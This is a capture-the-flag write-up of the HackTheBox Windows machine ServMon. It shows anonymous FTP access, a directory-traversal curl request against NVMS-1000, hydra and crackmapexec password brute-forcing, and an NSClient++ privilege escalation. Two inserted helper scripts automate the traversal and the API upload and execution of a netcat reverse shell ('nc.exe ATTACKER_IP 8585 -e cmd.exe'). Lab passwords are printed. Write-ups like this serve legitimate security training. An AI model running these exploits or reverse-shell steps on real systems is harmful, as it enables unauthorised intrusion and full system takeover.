ServMon just retired on HackTheBox; it's an easy-difficulty Windows box. This was my first Windows-based box ever, and it was quite new to me since I hadn't used Windows for the last 7 years. Nonetheless it was a good opportunity to learn a few new tricks by getting out of my comfort zone.
Overall I quite enjoyed this box, which is, in my opinion, the perfect opportunity to start on Windows-based boxes.
Tl;Dr: To get the user flag you had to retrieve a text file containing credentials through a Directory Traversal vulnerability in the network video surveillance software running on port 80. An anonymous FTP server then gives you a list of two users. Using the credentials found earlier you can brute-force one of the users' (Nadine's) password and grab the flag.
To get the root flag you had to exploit the NSClient++ monitoring daemon to achieve code execution as SYSTEM (the Windows equivalent of root) and read the flag.
Alright! Let’s get into the details now!
First things first, let's add the box IP to the hosts file (this needs root, since /etc/hosts is not writable by a normal user):
$ echo "10.10.10.184 servmon.htb" >> /etc/hosts
and let’s start!
Let's start with the classic nmap scan to see which ports are open on the box (-sT is a full TCP connect scan, -sC runs the default scripts, -sV grabs service versions and -p- covers all 65535 ports):
$ nmap -sV -sT -sC -p- servmon.htb
We have two web applications running on ports 80 and 8443, SMB on port 445, FTP on port 21 and finally SSH on port 22.
nmap indicates that anonymous login is allowed on the FTP server on port 21, and that it contains a Users directory. Looks quite promising.
Let’s take a look by ourselves:
$ ftp servmon.htb
Alright, since we have enough permissions, let's mirror the whole Users folder locally to browse its content more easily:
$ wget -r ftp://anonymous:@servmon.htb/
$ cat "servmon.htb/Users/Nathan/Notes to do.txt"
$ cat servmon.htb/Users/Nadine/Confidential.txt
That's interesting: according to Nadine there is a Passwords.txt file on Nathan's Desktop. Let's keep that in mind for later, it will probably come in handy.
Now that we are done with the FTP server, let's move on to port 80.
Opening http://servmon.htb displays the following login page:
That's an uncommon login page. A quick Google search on NVMS-1000 gives us the following information:
NVMS-1000 is a monitoring client which is specially designed for network video surveillance.
As with all obscure software, let's check whether any public exploit is available:
$ searchsploit "TVT NVMS 1000"
That sounds perfect for what we need.
Given the information we got earlier, we can probably retrieve the Passwords.txt file Nadine was talking about using this Directory Traversal vulnerability.
Reading the exploit code shows that we have to go back 12 levels to reach the drive root. Let's give it a try on the file located in /Users/Nathan/Desktop/ (according to Nadine's note). Note the --path-as-is flag: without it curl normalises the ../ sequences away before sending the request, so the traversal would never reach the server:
$ curl -i --path-as-is "http://servmon.htb/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt"
We got a few passwords:
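The 12-level figure above comes from the exploit, but in practice the depth is found by probing. The helper below is an added example of my own, not code from the original write-up or from the exploit: it builds a traversal URL with a chosen number of ../ segments and walks increasing depths with curl --path-as-is until the server answers 200. The host, target path and maximum depth are parameters; the default path is the one from Nadine's note, and nothing else about the target is assumed.

```shell
#!/bin/sh
# Added example: locate the directory-traversal depth against a web root.
# Not from the original write-up; host/path/depth are caller-supplied.
set -eu

# Build "<base>/../../...<path>" with exactly <depth> "../" segments.
traversal_url() {
  base=$1; depth=$2; path=$3; up=""; i=0
  while [ "$i" -lt "$depth" ]; do
    up="${up}../"
    i=$((i + 1))
  done
  printf '%s/%s%s\n' "$base" "$up" "$path"
}

# Try depths 1..max and print the first depth that returns HTTP 200.
# --path-as-is is essential: without it curl collapses the "../" segments
# client-side and the server never sees the traversal at all.
find_traversal_depth() {
  base=$1; path=$2; max=${3:-16}; depth=1
  while [ "$depth" -le "$max" ]; do
    code=$(curl -s -k --path-as-is -o /dev/null -w '%{http_code}' \
             "$(traversal_url "$base" "$depth" "$path")" || true)
    if [ "$code" = "200" ]; then
      echo "$depth"
      return 0
    fi
    depth=$((depth + 1))
  done
  return 1
}

# Network access only when a host is given on the command line, so the
# helpers above can be sourced and checked offline.
# Usage: ./traverse.sh http://servmon.htb [Users/Nathan/Desktop/Passwords.txt]
if [ "${1:-}" != "" ]; then
  target=${2:-Users/Nathan/Desktop/Passwords.txt}
  if depth=$(find_traversal_depth "$1" "$target"); then
    echo "traversal works at depth $depth" >&2
    curl -s -k --path-as-is "$(traversal_url "$1" "$depth" "$target")"
  else
    echo "no depth up to the maximum returned 200" >&2
    exit 1
  fi
fi
```

A 200 alone is only a first filter: some applications answer 200 with an error page for every path, so compare the body against a known file (the .txt files from the FTP server are convenient references here) before trusting the depth.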
Since SSH is open, maybe one of these passwords works for the Nathan user. Let's use hydra to try them:
$ hydra -l Nathan -P Passwords.txt 10.10.10.184 ssh
No luck, but it may be worth trying the same list against Nadine:
$ hydra -l Nadine -P Passwords.txt 10.10.10.184 ssh
Alright, we got Nadine's account password: "LikeBigButts at Work"…? Well ok, why not :P
Since SMB on port 445 is open, it was also possible to brute-force through this entry point. For this one I will use crackmapexec:
$ crackmapexec smb 10.10.10.184 -u Nadine -p Passwords.txt
Once again we get Nadine's credentials.
We can now connect to Nadine's account through SSH and grab the flag:
$ ssh nadine@servmon.htb
So far we didn't even need to look at what is running on port 8443. Since nothing is left to chance on HackTheBox, that's probably our way to root.
Opening https://servmon.htb:8443 displays the following page:
The web interface is really buggy and nothing can be done from there. I don't know whether that's intended, but anyway, let's move on.
Out of curiosity, let's check on searchsploit whether any vulnerabilities are known for this NSClient++ instance:
$ searchsploit nsclient
Navigating to the NSClient++ folder on the box allows us to confirm that the version running is vulnerable:
PS C:\Program Files\NSClient++> .\nscp --version
We are going to skip the Authenticated Remote Code Execution since, well, we already have code execution on the machine as Nadine. Privilege Escalation looks exactly like what we need to get to root. Let's take a look at it:
$ cat /usr/share/exploitdb/exploits/windows/local/46802.txt
Sounds really good, we have the detailed exploit procedure. One problem remains: most of the configuration needed to set up the exploit requires access to the web interface. Unfortunately this interface is completely buggy and unstable (at least when I was working on it), so we need to find a way to reach the same features without using the web interface.
After reading the documentation a little I am confident it should be possible to do so using only the REST API and the nscp command-line client.
Alright, let's get into it!
First we need to retrieve the admin account password. Let's use the nscp client to do so:
PS C:\Program Files\NSClient++> .\nscp web -- password --display
Then let's activate the CheckExternalScripts module, which is what lets NSClient++ run arbitrary scripts on our behalf:
PS C:\Program Files\NSClient++> .\nscp settings --activate-module CheckExternalScripts
Now let's download a Windows build of netcat and create our .bat reverse-shell script:
$ wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
Using scp we can send nc.exe to the box:
$ scp nc.exe nadine@servmon.htb:C:/Temp
Let’s make sure it’s been sent correctly:
PS C:\Program Files\NSClient++> ls C:\Temp
Alright, we have everything ready now. Let's use NSClient++ to execute our reverse shell with elevated privileges. To do so we need to add an "External Script" and then tell NSClient++ to execute it.
Since the web interface is not usable, we need to use the API. Thankfully it's almost fully documented.
The API is only reachable from localhost, so I will open an SSH tunnel (forwarding a local port, 4444 here, to the box's 8443) to make testing easier, since I am more comfortable working from my Linux machine.
Now we are all set up. Let's add our external script (the reverse shell) using the API:
$ curl -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:4444/api/v1/scripts/ext/scripts/hg8.bat --data-binary @hg8.bat
We can verify our script has been added:
$ curl -k -u admin:ew2x6SsGTxjRwXOT https://localhost:4444/api/v1/scripts/ext
Time to open our listener:
$ nc -l -vv -p 8585
And use the API again to execute our script. The execute command was not so straightforward to find in the documentation, but digging a little we can find it under the queries endpoint:
$ curl -k -u admin:ew2x6SsGTxjRwXOT "https://127.0.0.1:4444/api/v1/queries/hg8/commands/execute"
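The three API calls above (upload, verify, execute) are the whole privilege-escalation chain, so here they are wrapped in one script as an added example of my own, not code from the original write-up or from NSClient++. It assumes the SSH tunnel is already up (for instance ssh -L 4444:127.0.0.1:8443 nadine@servmon.htb, which is my assumption, not a command shown on the page), that the admin password printed by "nscp web -- password --display" has been exported as NSCP_PASSWORD, and that the script name and .bat file passed as arguments are placeholders. The check that the listing contains the uploaded script only assumes the file name appears somewhere in the JSON, not a particular layout.

```shell
#!/bin/sh
# Added example: register and run an external script through the NSClient++
# REST API. Not from the original write-up. Assumptions: the API is reachable
# on https://127.0.0.1:4444 through an SSH tunnel, NSCP_PASSWORD holds the
# admin password, and the script/file names are placeholders.
set -eu

API="${NSCP_API:-https://127.0.0.1:4444/api/v1}"

# URL used to upload (PUT) a script that becomes the query "<name>".
script_put_url() {
  printf '%s/scripts/ext/scripts/%s.bat\n' "$API" "$1"
}

# URL that runs the registered script through the query interface.
script_exec_url() {
  printf '%s/queries/%s/commands/execute\n' "$API" "$1"
}

# Success if the listing returned by GET /scripts/ext mentions "<name>.bat".
# Substring match on purpose: only the presence of the file name is assumed,
# not the exact JSON layout of the listing.
listing_has_script() {
  case "$1" in
    *"$2.bat"*) return 0 ;;
    *) return 1 ;;
  esac
}

# Upload, verify, execute. The .bat is expected to start the reverse shell,
# e.g. "C:\Temp\nc.exe ATTACKER_IP 8585 -e cmd.exe" (your own values), with a
# listener already waiting on that port.
run_script_via_api() {
  name=$1; bat=$2
  pw="${NSCP_PASSWORD:?export NSCP_PASSWORD first (nscp web -- password --display)}"
  curl -k -s -f -u "admin:$pw" -X PUT "$(script_put_url "$name")" --data-binary "@$bat"
  listing=$(curl -k -s -f -u "admin:$pw" "$API/scripts/ext")
  if ! listing_has_script "$listing" "$name"; then
    echo "script $name was not registered; is CheckExternalScripts active?" >&2
    return 1
  fi
  # The execute call may not return until the script ends, so run it in the
  # background (or a second terminal) if you still need this shell.
  curl -k -s -f -u "admin:$pw" "$(script_exec_url "$name")"
}

# Only touch the network when called with arguments, so the helpers can be
# sourced and checked offline. Usage: ./nscp_api.sh hg8 hg8.bat
if [ "$#" -ge 2 ]; then
  run_script_via_api "$1" "$2"
fi
```

The -f flag makes curl fail on HTTP errors, so a wrong password (401) or a missing endpoint stops the script at the upload step instead of silently moving on to a verify that can only fail.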
And on our listener a new connection opens: we have a shell as SYSTEM, the account the NSClient++ service runs under, which is the Windows equivalent of root:
$ nc -l -vv -p 8585
That's it folks! As always, do not hesitate to contact me with any questions or feedback!
See you next time ;)